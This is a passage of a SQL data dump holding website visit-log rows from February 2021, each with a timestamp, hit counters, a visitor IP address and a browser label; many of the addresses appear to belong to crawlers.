1529,1612430357,1,1,0,0,'66.249.70.45','chrome'),(551530,1612432124,1,0,1,0,'66.249.70.43',''),(551531,1612435038,1,1,0,0,'66.249.70.43','chrome'),(551532,1612436599,1,1,0,0,'66.249.70.45','chrome'),(551533,1612436944,1,1,0,0,'66.249.70.47','chrome'),(551534,1612441737,1,1,0,0,'66.249.70.47','chrome'),(551535,1612442182,1,1,0,0,'66.249.70.45','chrome'),(551536,1612442269,1,1,0,0,'66.249.70.43','chrome'),(551537,1612444451,1,1,0,0,'5.255.253.92','other'),(551538,1612444714,1,1,0,0,'66.249.70.45','chrome'),(551539,1612452362,1,1,0,0,'31.13.127.19','other'),(551540,1612454710,1,0,1,0,'66.249.70.47',''),(551541,1612454715,1,1,0,0,'66.249.70.43','chrome'),(551542,1612458902,1,0,1,0,'66.249.70.45',''),(551543,1612462274,1,1,0,0,'127.0.0.1','other'),(551544,1612464209,1,1,0,0,'31.13.127.15','other'),(551545,1612464212,1,1,0,0,'69.171.251.23','other'),(551547,1612464231,1,1,0,0,'37.73.124.81','other'),(551548,1612464440,2,2,0,0,'69.171.251.11','other'),(551549,1612470696,1,1,0,0,'66.249.70.43','chrome'),(551550,1612483408,1,0,1,0,'66.249.70.43',''),(551551,1612506421,4,4,0,0,'52.192.73.251','chrome'),(551552,1612516257,1,1,0,0,'66.220.149.26','other'),(551553,1612516849,2,1,1,0,'66.249.70.47',''),(551554,1612524748,1,1,0,0,'209.17.96.130','other'),(551555,1612527970,1,1,0,0,'66.220.149.18','other'),(551556,1612532259,1,1,0,0,'66.249.70.45','chrome'),(551557,1612540627,1,1,0,0,'31.13.127.2','other'),(551558,1612540630,1,1,0,0,'69.171.251.8','other'),(551560,1612540682,2,2,0,0,'31.13.127.29','other'),(551561,1612540683,1,1,0,0,'31.13.127.17','other'),(551562,1612541003,1,1,0,0,'31.13.127.27','other'),(551563,1612543126,1,0,1,0,'66.249.70.47',''),(551564,1612544817,1,1,0,0,'209.17.97.66','other'),(551565,1612554637,1,1,0,0,'173.252.127.45','other'),(551566,1612554638,1,1,0,0,'69.171.251.23','other'),(551567,1612554768,1,1,0,0,'31.13.127.24','other'),(551568,1612565802,1,0,1,0,'66.249.70.47',''),(551569,1612566108,1,0,1,0,'66.249.70.43',''),(551570,1612567107,1,1,0,0,'66.249.70.43','chrome'),(551571,1612572502,1,1,0,0,'66.249.70.45','chrome'),(551572,1612576712,1,1,0,0,'173.252.95.6','other'),(551573,1612576713,1,1,0,0,'66.220.149.27','other'),(551574,1612576825,1,1,0,0,'69.171.251.6','other'),(551575,1612577997,1,1,0,0,'66.249.70.45','chrome'),(551576,1612580018,1,1,0,0,'66.249.70.45','chrome'),(551577,1612584826,1,1,0,0,'5.255.253.87','other'),(551578,1612587593,1,1,0,0,'66.249.70.43','chrome'),(551579,1612588704,1,1,0,0,'175.44.42.20','other'),(551580,1612597183,4,4,0,0,'34.209.105.222','chrome'),(551581,1612600696,1,1,0,0,'5.255.253.92','other'),(551582,1612604063,1,0,1,0,'66.249.70.43',''),(551583,1612604813,1,1,0,0,'66.249.70.45','chrome'),(551584,1612606842,1,0,1,0,'66.249.70.43',''),(551585,1612607718,1,0,1,0,'66.249.70.45',''),(551586,1612608380,1,1,0,0,'216.218.141.227','chrome'),(551587,1612608585,1,1,0,0,'216.218.191.195','chrome'),(551588,1612608587,1,1,0,0,'64.71.166.34','firefox'),(551589,1612619110,1,1,0,0,'69.171.251.113','other'),(551590,1612621503,1,1,0,0,'66.249.70.47','chrome'),(551591,1612626807,1,0,1,0,'66.249.70.43',''),(551592,1612633473,1,0,1,0,'66.249.70.43',''),(551593,1612639506,1,0,1,0,'66.249.70.43',''),(551594,1612641915,1,1,0,0,'173.252.111.18','other'),(551595,1612641916,1,1,0,0,'31.13.127.7','other'),(551596,1612652102,1,1,0,0,'66.249.70.43','chrome'),(551597,1612652103,1,1,0,0,'66.249.70.45','chrome'),(551598,1612657479,1,0,1,0,'66.249.70.43',''),(551599,1612666608,1,1,0,0,'5.255.253.92','other'),(551600,1612672315,1,1,0,0,'66.249.70.45','chrome'),(551601,1612673452,1,0,1,0,'66.249.70.45',''),(551602,1612682498,1,1,0,0,'192.99.14.189','chrome'),(551603,1612686529,1,1,0,0,'66.249.70.47','chrome'),(551604,1612690635,1,0,1,0,'66.249.70.45',''),(551605,1612703923,1,0,1,0,'66.249.70.47',''),(551606,1612711158,1,1,0,0,'69.171.251.9','other'),(551607,1612712722,1,1,0,0,'5.255.253.92','other'),(551608,1612716469,1,1,0,0,'185.237.217.11','chrome'),(551609,1612725238,1,1,0,0,'173.252.111.18','other'),(551610,1612726371,3,3,0,0,'23.228.109.147','chrome'),(551611,1612731497,1,1,0,0,'216.218.191.202','chrome'),(551612,1612738576,2,1,1,0,'66.249.70.45',''),(551613,1612740349,1,0,1,0,'66.249.70.45',''),(551614,1612754245,1,0,1,0,'66.249.70.43',''),(551615,1612754260,2,2,0,0,'66.249.70.45','chrome'),(551616,1612755097,1,1,0,0,'66.249.70.47','chrome'),(551617,1612756758,1,1,0,0,'66.249.70.45','chrome'),(551618,1612757507,1,1,0,0,'66.249.70.43','chrome'),(551619,1612757950,1,1,0,0,'66.249.70.47','chrome'),(551620,1612759578,2,1,1,0,'66.249.70.43',''),(551621,1612759870,1,1,0,0,'66.249.70.47','chrome'),(551622,1612761219,1,1,0,0,'66.249.70.47','chrome'),(551623,1612761328,2,2,0,0,'66.249.70.43','chrome'),(551624,1612762645,2,2,0,0,'66.249.70.47','chrome'),(551625,1612762712,1,1,0,0,'66.249.70.43','chrome'),(551626,1612763436,1,1,0,0,'66.249.70.45','chrome'),(551627,1612763791,2,2,0,0,'66.249.70.43','chrome'),(551628,1612763919,2,2,0,0,'66.249.70.47','chrome'),(551629,1612764377,3,3,0,0,'66.249.70.45','chrome'),(551630,1612764890,3,3,0,0,'66.249.70.43','chrome'),(551631,1612765474,2,2,0,0,'66.249.70.45','chrome'),(551632,1612765770,3,3,0,0,'66.249.70.47','chrome'),(551633,1612766555,1,1,0,0,'66.249.70.45','chrome'),(551634,1612767228,3,3,0,0,'66.249.70.43','chrome'),(551635,1612777045,1,0,1,0,'66.249.70.43',''),(551636,1612808949,1,0,1,0,'66.249.70.45',''),(551637,1612822898,3,3,0,0,'66.249.70.43','chrome'),(551638,1612834105,1,0,1,0,'66.249.70.43',''),(551639,1612834311,1,1,0,0,'66.249.70.43','chrome'),(551640,1612834604,1,1,0,0,'66.249.70.47','chrome'),(551641,1612838334,1,1,0,0,'66.249.70.45','chrome'),(551642,1612839241,1,1,0,0,'66.249.70.45','chrome'),(551643,1612841582,1,1,0,0,'66.249.70.47','chrome'),(551644,1612845244,1,1,0,0,'66.249.70.43','chrome'),(551645,1612845259,1,1,0,0,'66.249.70.45','chrome'),(551646,1612847188,1,0,1,0,'66.249.70.43',''),(551647,1612856735,4,4,0,0,'66.249.70.43','chrome'),(551648,1612856763,1,1,0,0,'66.249.70.45','chrome'),(551649,1612858217,1,0,1,0,'66.249.70.43',''),(551650,1612859319,1,1,0,0,'66.249.70.43','chrome'),(551651,1612864299,1,0,1,0,'66.249.70.45',''),(551652,1612865074,1,1,0,0,'31.13.127.13','other'),(551653,1612865199,1,0,1,0,'66.249.70.43',''),(551654,1612869941,1,1,0,0,'66.249.70.45','chrome'),(551655,1612870164,1,0,1,0,'66.249.70.47',''),(551656,1612873733,1,1,0,0,'31.13.127.32','other'),(551657,1612873946,1,1,0,0,'66.249.70.45','chrome'),(551658,1612877212,1,1,0,0,'66.249.70.47','chrome'),(551659,1612878629,1,1,0,0,'66.220.149.33','other'),(551660,1612880650,1,1,0,0,'66.249.70.47','chrome'),(551661,1612880687,2,2,0,0,'66.249.70.43','chrome'),(551662,1612884809,1,1,0,0,'66.249.70.57','chrome'),(551663,1612886250,1,1,0,0,'69.171.251.30','other'),(551664,1612886937,1,1,0,0,'31.13.127.30','other'),(551665,1612889650,1,1,0,0,'66.249.70.57','chrome'),(551666,1612890707,1,1,0,0,'31.13.127.29','other'),(551667,1612890734,1,1,0,0,'173.252.127.12','other'),(551669,1612890802,1,1,0,0,'91.196.178.177','chrome'),(551670,1612891123,1,1,0,0,'66.249.70.45','chrome'),(551671,1612891228,2,2,0,0,'66.249.70.43','chrome'),(551672,1612891958,1,1,0,0,'66.249.70.47','chrome'),(551673,1612893158,1,1,0,0,'66.249.70.47','chrome'),(551674,1612895961,1,1,0,0,'66.249.70.47','chrome'),(551675,1612896199,1,0,1,0,'66.249.70.43',''),(551676,1612896903,1,1,0,0,'66.249.70.43','chrome'),(551677,1612898300,1,1,0,0,'66.249.70.47','chrome'),(551678,1612898303,1,1,0,0,'66.249.70.43','chrome'),(551679,1612898315,2,2,0,0,'66.249.70.45','chrome'),(551680,1612900969,1,1,0,0,'173.252.127.7','other'),(551681,1612902590,1,1,0,0,'66.249.70.45','chrome'),(551682,1612907299,1,1,0,0,'173.252.95.11','other'),(551683,1612908356,2,1,1,0,'66.249.70.43',''),(551684,1612908625,3,2,1,0,'66.249.70.45',''),(551685,1612908974,1,1,0,0,'66.249.70.47','chrome'),(551686,1612918305,1,0,1,0,'66.249.70.45',''),(551687,1612918674,1,0,1,0,'66.249.70.43',''),(551688,1612923733,1,1,0,0,'66.249.70.45','chrome'),(551689,1612927585,1,1,0,0,'66.249.70.47','chrome'),(551690,1612932293,1,0,1,0,'66.249.70.47',''),(551691,1612932604,1,1,0,0,'66.249.70.47','chrome'),(551692,1612932623,1,1,0,0,'66.249.70.43','chrome'),(551693,1612934600,1,1,0,0,'31.13.127.19','other'),(551694,1612936328,1,0,1,0,'66.249.70.45',''),(551695,1612941925,1,1,0,0,'66.249.70.43','chrome'),(551696,1612947070,1,1,0,0,'66.249.70.45','chrome'),(551697,1612947281,1,1,0,0,'209.17.97.98','other'),(551698,1612949818,1,0,1,0,'66.249.70.43',''),(551699,1612972253,1,1,0,0,'66.249.70.45','chrome'),(551700,1612981037,1,1,0,0,'66.249.70.47','chrome'),(551701,1612992155,1,1,0,0,'66.249.70.45','chrome'),(551702,1612992542,1,0,1,0,'66.249.70.43',''),(551703,1612993134,1,0,1,0,'66.249.70.45',''),(551704,1613006418,1,1,0,0,'66.249.70.47','chrome'),(551705,1613018026,1,1,0,0,'66.249.70.43','chrome'),(551706,1613021655,1,1,0,0,'173.252.127.17','chrome'),(551707,1613021677,1,1,0,0,'173.252.127.10','chrome'),(551708,1613021678,1,1,0,0,'173.252.127.25','chrome'),(551709,1613026432,1,1,0,0,'69.171.251.25','other'),(551710,1613026550,1,1,0,0,'209.17.97.2','other'),(551711,1613027754,1,1,0,0,'66.249.70.45','chrome'),(551712,1613029267,1,0,1,0,'66.249.70.43',''),(551713,1613035437,1,0,1,0,'66.249.70.45',''),(551714,1613036002,1,1,0,0,'66.249.70.47','chrome'),(551715,1613048094,1,1,0,0,'66.249.70.45','chrome'),(551716,1613049729,1,0,1,0,'66.249.70.45',''),(551717,1613052141,1,1,0,0,'31.13.127.5','other'),(551718,1613054122,2,1,1,0,'66.249.70.45',''),(551719,1613055101,1,1,0,0,'66.249.70.43','chrome'),(551720,1613055136,1,1,0,0,'31.13.127.24','other'),(551721,1613060835,1,1,0,0,'66.249.70.43','chrome'),(551722,1613066244,1,1,0,0,'66.249.70.47','chrome'),(551723,1613074990,1,0,1,0,'66.249.70.45',''),(551724,1613078549,2,2,0,0,'66.249.70.45','chrome'),(551725,1613082330,2,1,1,0,'66.249.70.47',''),(551726,1613083835,1,0,1,0,'66.249.70.43',''),(551727,1613085833,1,1,0,0,'66.249.70.45','chrome'),(551728,1613086350,1,1,0,0,'66.249.70.43','chrome'),(551729,1613094502,1,1,0,0,'66.249.70.45','chrome'),(551730,1613094563,1,1,0,0,'66.249.70.47','chrome'),(551731,1613100175,1,1,0,0,'51.159.37.33','chrome'),(551732,1613113449,1,1,0,0,'66.249.70.47','chrome'),(551733,1613121195,1,0,1,0,'66.249.70.47',''),(551734,1613135862,1,0,1,0,'66.249.70.45',''),(551735,1613137049,1,1,0,0,'66.220.149.6','other'),(551736,1613137511,2,2,0,0,'31.13.103.7','other'),(551737,1613137974,1,1,0,0,'66.249.70.47','chrome'),(551738,1613138703,1,1,0,0,'209.17.96.226','other'),(551739,1613138985,1,1,0,0,'185.237.217.11','chrome'),(551740,1613139451,1,1,0,0,'31.13.127.30','other'),(551741,1613139452,1,1,0,0,'31.13.127.4','other'),(551742,1613139453,1,1,0,0,'31.13.127.12','other'),(551743,1613139454,1,1,0,0,'31.13.127.21','other'),(551744,1613139455,1,1,0,0,'69.171.251.27','other'),(551745,1613139456,1,1,0,0,'31.13.127.14','other'),(551746,1613139468,1,1,0,0,'31.13.127.24','other'),(551748,1613139469,2,2,0,0,'31.13.127.31','other'),(551749,1613139472,1,1,0,0,'31.13.127.26','other'),(551750,1613139685,1,1,0,0,'31.13.127.17','other'),(551751,1613139944,1,1,0,0,'69.171.251.18','other'),(551752,1613140314,1,1,0,0,'66.220.149.29','other'),(551753,1613140769,1,1,0,0,'69.171.251.31','other'),(551754,1613140950,1,1,0,0,'69.171.251.21','other'),(551755,1613141076,1,1,0,0,'66.220.149.20','other'),(551756,1613141112,1,1,0,0,'91.196.178.58','other'),(551757,1613141127,1,1,0,0,'173.252.83.120','other'),(551758,1613141178,1,1,0,0,'173.252.127.113','other'),(551759,1613141810,1,1,0,0,'69.171.251.31','other'),(551760,1613142408,1,1,0,0,'173.252.127.21','other'),(551761,1613142495,1,1,0,0,'178.133.164.196','chrome'),(551762,1613142708,1,1,0,0,'69.171.251.119','other'),(551763,1613143164,1,1,0,0,'69.171.251.28','other'),(551764,1613143855,1,1,0,0,'69.171.251.116','other'),(551765,1613143912,1,1,0,0,'173.252.127.26','other'),(551766,1613144885,1,1,0,0,'173.252.127.31','other'),(551767,1613144896,1,1,0,0,'91.196.178.114','chrome'),(551768,1613145270,1,1,0,0,'173.252.127.116','other'),(551769,1613145336,1,1,0,0,'31.13.127.7','other'),(551770,1613145713,1,1,0,0,'173.252.127.9','other'),(551771,1613147629,1,1,0,0,'173.252.127.33','other'),(551772,1613147677,1,1,0,0,'31.13.127.117','other'),(551773,1613147985,1,1,0,0,'46.211.16.116','chrome'),(551774,1613148137,1,1,0,0,'173.252.127.2','other'),(551775,1613148360,1,1,0,0,'66.220.149.40','other'),(551776,1613148394,1,1,0,0,'69.171.251.9','other'),(551777,1613148418,1,1,0,0,'94.178.245.83','chrome'),(551778,1613148559,1,1,0,0,'173.252.127.113','other'),(551779,1613148564,1,1,0,0,'31.13.127.1','other'),(551780,1613148566,1,1,0,0,'69.171.251.12','other'),(551781,1613148655,1,1,0,0,'31.13.127.2','other'),(551782,1613148656,1,1,0,0,'31.13.127.6','other'),(551783,1613148705,1,1,0,0,'69.171.251.16','other'),(551784,1613150454,1,1,0,0,'69.171.251.16','other'),(551785,1613151003,1,1,0,0,'173.252.127.17','other'),(551786,1613151087,1,1,0,0,'31.13.127.9','other'),(551787,1613151881,1,1,0,0,'94.153.25.78','chrome'),(551788,1613152744,1,1,0,0,'31.13.127.117','other'),(551789,1613153577,1,1,0,0,'212.103.50.78','firefox'),(551790,1613153802,1,1,0,0,'66.249.70.47','chrome'),(551791,1613154272,1,1,0,0,'66.249.70.43','chrome'),(551792,1613154832,1,1,0,0,'69.171.251.15','other'),(551793,1613155284,1,1,0,0,'66.249.70.45','chrome'),(551794,1613155294,2,1,1,0,'66.249.70.43',''),(551795,1613155342,1,1,0,0,'69.171.251.116','other'),(551796,1613160407,1,1,0,0,'66.220.149.36','other'),(551797,1613160645,1,0,1,0,'66.249.70.43',''),(551798,1613163235,1,1,0,0,'173.252.127.21','other'),(551799,1613163322,1,1,0,0,'69.171.251.117','other'),(551800,1613163376,1,1,0,0,'66.249.70.43','chrome'),(551801,1613164045,1,1,0,0,'173.252.127.10','other'),(551802,1613164852,1,1,0,0,'66.249.70.45','chrome'),(551803,1613165866,1,0,1,0,'66.249.70.45',''),(551804,1613166515,1,1,0,0,'173.252.127.22','other'),(551805,1613170451,1,1,0,0,'69.171.251.111','other'),(551806,1613176084,1,1,0,0,'66.249.70.47','chrome'),(551807,1613176829,1,0,1,0,'66.249.70.45',''),(551808,1613189517,1,1,0,0,'66.220.149.28','other'),(551809,1613189539,1,1,0,0,'31.13.127.9','other'),(551810,1613194399,4,4,0,0,'52.192.73.251','chrome'),(551811,1613195124,2,2,0,0,'31.13.127.12','other'),(551812,1613195125,1,1,0,0,'31.13.127.120','other'),(551814,1613195127,1,1,0,0,'31.13.127.7','other'),(551815,1613195128,1,1,0,0,'31.13.127.19','other'),(551816,1613198415,1,1,0,0,'69.171.251.15','other'),(551817,1613199911,1,1,0,0,'31.13.103.7','other'),(551818,1613200808,1,1,0,0,'69.171.251.12','other'),(551819,1613203436,1,1,0,0,'46.211.74.120','chrome'),(551820,1613206761,1,0,1,0,'66.249.70.45',''),(551821,1613206853,1,1,0,0,'66.220.149.5','other'),(551822,1613211219,1,1,0,0,'66.249.70.43','chrome'),(551823,1613212667,2,2,0,0,'66.249.70.47','chrome'),(551824,1613213426,1,1,0,0,'66.249.70.45','chrome'),(551825,1613214406,1,1,0,0,'66.249.70.43','chrome'),(551826,1613214407,1,1,0,0,'66.249.70.45','chrome'),(551827,1613214489,1,1,0,0,'173.252.127.17','other'),(551828,1613215627,1,0,1,0,'66.249.70.43',''),(551829,1613215967,1,1,0,0,'173.252.127.118','other'),(551830,1613217380,1,0,1,0,'66.249.70.47',''),(551831,1613217384,1,1,0,0,'66.220.149.120','other'),(551832,1613218437,1,1,0,0,'66.220.149.29','other'),(551833,1613223823,1,0,1,0,'66.249.70.47',''),(551834,1613231468,1,1,0,0,'69.171.251.17','other'),(551835,1613232339,1,1,0,0,'84.17.61.21','firefox'),(551836,1613236521,1,1,0,0,'173.252.127.27','other'),(551837,1613239226,1,0,1,0,'66.249.70.43',''),(551838,1613246613,1,0,1,0,'66.249.70.45',''),(551839,1613248611,1,1,0,0,'173.252.111.23','other'),(551840,1613250220,1,0,1,0,'66.249.70.45',''),(551841,1613250345,1,1,0,0,'66.249.70.43','chrome'),(551842,1613251886,1,0,1,0,'66.249.70.45',''),(551843,1613255627,1,0,1,0,'66.249.70.43',''),(551844,1613261289,1,0,1,0,'66.249.70.47',''),(551845,1613262889,1,0,1,0,'66.249.70.47',''),(551846,1613273685,1,0,1,0,'66.249.70.47',''),(551847,1613276961,1,1,0,0,'66.249.70.43','chrome'),(551848,1613277827,1,1,0,0,'31.13.103.10','other'),(551849,1613281115,1,1,0,0,'66.249.70.45','chrome'),(551850,1613281286,2,2,0,0,'66.249.70.47','chrome'),(551851,1613284597,1,1,0,0,'34.96.130.193','other'),(551852,1613284974,1,1,0,0,'66.249.70.45','chrome'),(551853,1613287961,2,1,1,0,'66.249.70.43',''),(551854,1613289001,1,0,1,0,'66.249.70.47',''),(551855,1613292880,1,0,1,0,'66.249.70.45',''),(551856,1613293113,1,0,1,0,'66.249.70.47',''),(551857,1613294717,1,1,0,0,'66.249.70.47','chrome'),(551858,1613302080,1,1,0,0,'66.249.70.43','chrome'),(551859,1613302464,1,1,0,0,'66.249.70.45','chrome'),(551860,1613304928,2,2,0,0,'66.249.70.43','chrome'),(551861,1613314013,1,0,1,0,'66.249.70.43',''),(551862,1613314899,1,1,0,0,'66.220.149.17','other'),(551863,1613315256,1,0,1,0,'66.249.70.43',''),(551864,1613319796,1,1,0,0,'31.13.127.117','other'),(551865,1613320897,1,1,0,0,'91.231.43.235','chrome'),(551866,1613322848,1,1,0,0,'31.13.127.23','other'),(551867,1613324269,1,1,0,0,'69.171.251.15','other'),(551868,1613324581,1,1,0,0,'185.11.29.224','chrome'),(551869,1613328282,1,1,0,0,'69.171.251.119','other'),(551870,1613346257,1,0,1,0,'66.249.70.45',''),(551871,1613350364,1,0,1,0,'66.249.70.43',''),(551872,1613354070,1,1,0,0,'34.96.130.141','other'),(551873,1613375356,1,1,0,0,'173.252.127.28','other'),(551874,1613375758,1,1,0,0,'66.220.149.29','other'),(551875,1613378622,1,0,1,0,'66.249.70.43',''),(551876,1613384920,1,1,0,0,'91.196.177.227','chrome'),(551877,1613393013,1,1,0,0,'173.252.127.33','other'),(551878,1613400878,1,1,0,0,'173.252.127.14','other'),(551879,1613404240,1,0,1,0,'66.249.70.43',''),(551880,1613408809,1,1,0,0,'31.13.127.16','other'),(551881,1613416102,1,1,0,0,'173.252.111.1','other'),(551882,1613419028,1,1,0,0,'69.171.251.34','other'),(551883,1613420239,1,1,0,0,'64.246.165.140','firefox'),(551884,1613424664,1,1,0,0,'173.252.95.10','other'),(551885,1613426265,1,1,0,0,'34.96.130.251','other'),(551886,1613429500,1,1,0,0,'31.13.127.14','other'),(551887,1613437671,1,0,1,0,'66.249.70.43',''),(551888,1613453633,1,1,0,0,'31.13.127.3','chrome'),(551889,1613453648,1,1,0,0,'31.13.127.5','chrome'),(551890,1613453649,1,1,0,0,'31.13.127.7','chrome'),(551891,1613457113,1,1,0,0,'66.249.70.45','chrome'),(551892,1613462487,1,1,0,0,'91.196.178.76','chrome'),(551893,1613465060,1,0,1,0,'66.249.70.43',''),(551894,1613465061,1,0,1,0,'66.249.70.45',''),(551895,1613481439,1,1,0,0,'173.252.127.26','other'),(551896,1613481745,1,1,0,0,'31.13.127.19','other'),(551897,1613481750,1,1,0,0,'31.13.127.6','other'),(551898,1613481755,1,1,0,0,'31.13.127.29','other'),(551899,1613481758,1,1,0,0,'173.252.95.27','other'),(551900,1613481850,1,1,0,0,'31.13.127.10','other'),(551901,1613481894,2,2,0,0,'31.13.127.26','other'),(551902,1613482202,1,1,0,0,'31.13.127.21','other'),(551903,1613483680,1,1,0,0,'34.86.35.204','other'),(551904,1613483863,1,1,0,0,'66.249.70.47','chrome'),(551905,1613499733,2,2,0,0,'37.53.172.132','chrome'),(551906,1613502965,1,0,1,0,'66.249.70.45',''),(551907,1613511278,1,1,0,0,'66.249.70.47','chrome'),(551908,1613518552,1,1,0,0,'66.249.70.43','chrome'),(551909,1613527714,1,0,1,0,'66.249.70.47',''),(551910,1613533629,1,1,0,0,'84.17.61.21','chrome'),(551911,1613545960,1,1,0,0,'91.196.178.76','chrome'),(551912,1613545995,1,1,0,0,'31.13.127.18','other'),(551913,1613545996,2,2,0,0,'31.13.127.25','other'),(551914,1613545997,2,2,0,0,'31.13.127.1','other'),(551915,1613546002,1,1,0,0,'31.13.127.3','other'),(551920,1613546003,1,1,0,0,'31.13.127.24','other'),(551921,1613546004,1,1,0,0,'31.13.127.15','other'),(551924,1613546005,1,1,0,0,'31.13.127.7','other'),(551925,1613546008,1,1,0,0,'69.171.249.18','other'),(551926,1613546013,1,1,0,0,'69.171.251.13','other'),(551927,1613547711,1,1,0,0,'66.249.70.43','chrome'),(551928,1613548414,1,1,0,0,'188.190.50.140','chrome'),(551929,1613551827,1,1,0,0,'94.153.0.87','chrome'),(551930,1613551912,1,1,0,0,'46.211.86.136','chrome'),(551931,1613570816,1,1,0,0,'192.162.233.12','chrome'),(551932,1613578210,1,1,0,0,'193.142.159.76','chrome'),(551933,1613578429,1,1,0,0,'77.52.12.67','other'),(551934,1613581362,1,1,0,0,'46.211.23.70','chrome'),(551935,1613582003,1,1,0,0,'51.81.0.103','firefox'),(551936,1613585548,1,0,1,0,'66.249.70.47',''),(551937,1613587780,1,1,0,0,'185.177.190.228','chrome'),(551938,1613589810,1,1,0,0,'173.252.127.9','other'),(551939,1613593730,1,1,0,0,'66.249.70.45','chrome'),(551940,1613596004,1,1,0,0,'129.146.122.45','chrome'),(551941,1613614184,1,0,1,0,'66.249.70.45',''),(551942,1613622427,1,1,0,0,'66.249.70.45','chrome'),(551943,1613628844,1,1,0,0,'66.249.70.45','chrome'),(551944,1613636417,1,0,1,0,'66.249.70.43',''),(551945,1613636981,1,1,0,0,'66.220.149.46','other'),(551946,1613644576,1,1,0,0,'18.204.210.57','chrome'),(551947,1613651908,1,1,0,0,'31.13.127.10','other'),(551948,1613651909,1,1,0,0,'31.13.127.13','other'),(551949,1613671132,1,0,1,0,'66.249.70.43',''),(551950,1613672193,1,0,1,0,'66.249.70.43',''),(551951,1613673768,1,1,0,0,'173.252.127.117','other'),(551952,1613674616,1,1,0,0,'185.237.217.11','chrome'),(551953,1613676904,1,1,0,0,'173.252.127.13','other'),(551954,1613677565,1,1,0,0,'66.249.70.43','chrome'),(551955,1613681321,1,0,1,0,'66.249.70.43',''),(551956,1613690497,1,1,0,0,'66.249.70.45','chrome'),(551957,1613693043,9,9,0,0,'193.9.158.175','firefox'),(551958,1613693046,1,1,0,0,'193.9.158.175','chrome'),(551959,1613701683,1,0,1,0,'66.249.70.43',''),(551960,1613712606,1,0,1,0,'66.249.70.43',''),(551961,1613721960,1,0,1,0,'66.249.70.45',''),(551962,1613723653,1,0,1,0,'66.249.70.43',''),(551963,1613728328,1,1,0,0,'66.249.70.45','chrome'),(551964,1613732200,1,1,0,0,'66.249.70.45','chrome'),(551965,1613737604,1,1,0,0,'94.153.83.101','other'),(551966,1613744270,2,2,0,0,'31.13.127.118','other'),(551967,1613744273,1,1,0,0,'31.13.127.29','other'),(551968,1613760789,1,1,0,0,'173.252.111.23','other'),(551969,1613760825,1,1,0,0,'69.171.251.16','other'),(551970,1613769327,1,1,0,0,'66.249.70.47','chrome'),(551971,1613769336,1,0,1,0,'66.249.70.43',''),(551972,1613772901,1,0,1,0,'66.249.70.45',''),(551973,1613775960,1,0,1,0,'66.249.70.45',''),(551974,1613776252,1,0,1,0,'66.249.70.47',''),(551975,1613780183,1,1,0,0,'66.249.70.45','chrome'),(551976,1613782976,2,0,2,0,'66.249.70.43',''),(551977,1613782991,1,0,1,0,'66.249.70.47',''),(551978,1613784603,1,0,1,0,'66.249.70.43',''),(551979,1613787201,1,0,1,0,'66.249.70.43',''),(551980,1613807616,1,1,0,0,'66.249.70.43','chrome'),(551981,1613812814,1,1,0,0,'66.249.70.47','chrome'),(551982,1613814450,1,1,0,0,'66.249.70.45','chrome'),(551983,1613814465,1,1,0,0,'66.249.70.43','chrome'),(551984,1613814481,1,1,0,0,'66.249.70.47','chrome'),(551985,1613816240,1,1,0,0,'66.249.70.43','chrome'),(551986,1613824567,1,1,0,0,'69.171.251.118','other'),(551987,1613826039,2,2,0,0,'31.13.127.6','other'),(551988,1613826217,1,1,0,0,'95.47.56.213','chrome'),(551989,1613826240,1,1,0,0,'173.252.127.18','other'),(551990,1613830079,1,0,1,0,'66.249.70.43',''),(551991,1613832270,1,0,1,0,'66.249.70.45',''),(551992,1613836544,1,1,0,0,'66.249.70.43','chrome'),(551993,1613841273,2,2,0,0,'185.237.217.11','chrome'),(551994,1613841654,1,1,0,0,'173.252.127.21','other'),(551995,1613843011,1,1,0,0,'185.237.217.11','chrome'),(551996,1613843646,1,1,0,0,'31.13.127.16','other'),(551997,1613843648,1,1,0,0,'31.13.127.5','other'),(551998,1613843649,2,2,0,0,'31.13.127.2','other'),(551999,1613843650,1,1,0,0,'31.13.127.18','other'),(552001,1613843652,1,1,0,0,'31.13.127.3','other'),(552002,1613843658,1,1,0,0,'31.13.127.120','other'),(552003,1613843659,1,1,0,0,'31.13.127.29','other'),(552004,1613843661,1,1,0,0,'31.13.127.24','other'),(552005,1613843662,1,1,0,0,'31.13.127.14','other'),(552006,1613843669,1,1,0,0,'31.13.127.22','other'),(552007,1613843680,1,1,0,0,'66.220.149.4','other'),(552008,1613843689,1,1,0,0,'69.171.251.20','other'),(552009,1613843714,1,1,0,0,'173.252.127.31','other'),(552010,1613843788,1,1,0,0,'173.252.95.111','other'),(552011,1613846557,1,1,0,0,'66.249.70.43','chrome'),(552012,1613854315,1,1,0,0,'66.220.149.48','other'),(552013,1613857548,1,1,0,0,'37.53.228.183','chrome'),(552014,1613863313,1,1,0,0,'66.249.70.47','chrome'),(552015,1613871200,1,0,1,0,'66.249.70.43',''),(552016,1613873571,1,1,0,0,'31.13.127.116','other'),(552017,1613875458,1,0,1,0,'66.249.70.47',''),(552018,1613878957,1,1,0,0,'66.249.70.45','chrome'),(552019,1613887319,1,0,1,0,'66.249.70.47',''),(552020,1613893836,1,1,0,0,'173.252.127.13','other'),(552021,1613897826,1,0,1,0,'66.249.70.43',''),(552022,1613899508,1,0,1,0,'66.249.70.43',''),(552023,1613904788,1,1,0,0,'185.237.217.11','chrome'),(552024,1613907652,1,0,1,0,'66.249.70.43',''),(552025,1613912833,1,1,0,0,'185.237.217.11','chrome'),(552026,1613912860,1,1,0,0,'31.13.115.2','other'),(552027,1613912862,1,1,0,0,'31.13.115.116','other'),(552028,1613912864,1,1,0,0,'173.252.127.4','other'),(552029,1613914144,1,1,0,0,'66.220.149.29','other'),(552030,1613914157,1,1,0,0,'95.134.203.46','chrome'),(552031,1613914633,1,1,0,0,'173.252.127.37','other'),(552032,1613923512,1,1,0,0,'66.249.70.45','chrome'),(552033,1613923525,2,2,0,0,'66.249.70.43','chrome'),(552034,1613925148,1,1,0,0,'31.13.127.20','other'),(552035,1613926615,1,1,0,0,'66.249.70.43','chrome'),(552036,1613930688,1,1,0,0,'185.237.217.11','chrome'),(552037,1613940601,1,1,0,0,'173.252.111.24','other'),(552038,1613940623,1,1,0,0,'173.252.111.120','other'),(552040,1613943118,1,1,0,0,'69.171.251.13','other'),(552041,1613943297,1,1,0,0,'31.13.127.119','other'),(552042,1613943306,1,1,0,0,'173.252.127.1','other'),(552043,1613943314,1,1,0,0,'69.171.251.10','other'),(552044,1613943333,1,1,0,0,'91.196.178.186','chrome'),(552045,1613943494,1,1,0,0,'31.13.127.15','other'),(552046,1613952921,1,1,0,0,'173.252.127.24','other'),(552047,1613954829,1,0,1,0,'66.249.70.43',''),(552048,1613957764,1,1,0,0,'66.249.70.43','chrome'),(552049,1613961